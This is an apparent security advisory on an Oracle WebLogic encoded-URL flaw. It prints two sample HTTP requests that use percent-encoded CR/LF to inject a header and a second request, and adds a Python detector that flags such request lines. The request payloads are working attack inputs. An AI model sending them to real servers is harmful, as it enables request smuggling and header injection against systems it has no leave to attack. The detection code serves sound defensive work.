Oracle WebLogic Server Encoded URL Remote Vulnerability

Attackers can exploit this issue using readily available tools.

The following example requests are available:

GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1
Host: vulnerable.example.com
Connection: close

GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1
Host: vulnerable.example.com
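
Both example requests carry percent-encoded CR/LF (%0d%0a) and an embedded "HTTP/1.1" token inside the request target. The following detection check is an added example, not part of the original advisory; the benign sample lines, the finding names and the decode-round limit are assumptions made for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines: the first two are the request lines
# shown above, the rest are benign traffic made up for this example.
SAMPLE_REQUEST_LINES = [
    "GET /logo.gif%20HTTP/1.1%0d%0aX-hdr:%20x HTTP/1.1",
    "GET /logo.gif%20HTTP/1.1%0d%0aHost:%20vulnerable.example.com%0d%0a%0d%0aGET%20/inject.gif HTTP/1.1",
    "GET /logo.gif HTTP/1.1",
    "GET /search?q=hello%20world HTTP/1.1",
    "GET /docs/HTTP%20basics.html HTTP/1.1",
]

EMBEDDED_VERSION = re.compile(r"\sHTTP/\d\.\d(\s|$)")
EMBEDDED_REQUEST = re.compile(r"[\r\n](GET|POST|HEAD|PUT|DELETE|OPTIONS) \S")
MAX_DECODE_ROUNDS = 3  # assumption: enough to catch double/triple encoding

def fully_decode(target):
    """Percent-decode repeatedly so %250d%250a is treated like %0d%0a."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(target, encoding="latin-1")
        if decoded == target:
            break
        target = decoded
    return target

def inspect_request_line(line):
    """Return a list of findings for one 'METHOD target VERSION' line."""
    parts = line.split(" ")
    if len(parts) != 3:
        return ["malformed-request-line"]
    decoded = fully_decode(parts[1])
    findings = []
    if "\r" in decoded or "\n" in decoded:
        findings.append("encoded-crlf-in-target")
    if EMBEDDED_VERSION.search(decoded):
        findings.append("embedded-http-version")
    if EMBEDDED_REQUEST.search(decoded):  # second request line after CR/LF
        findings.append("embedded-request-line")
    return findings

def scan(lines):
    """Map each suspicious request line to its findings."""
    return {line: f for line in lines if (f := inspect_request_line(line))}

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUEST_LINES).items():
        print(", ".join(findings), "<-", line)
```
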


 

Copyright 2010, SecurityFocus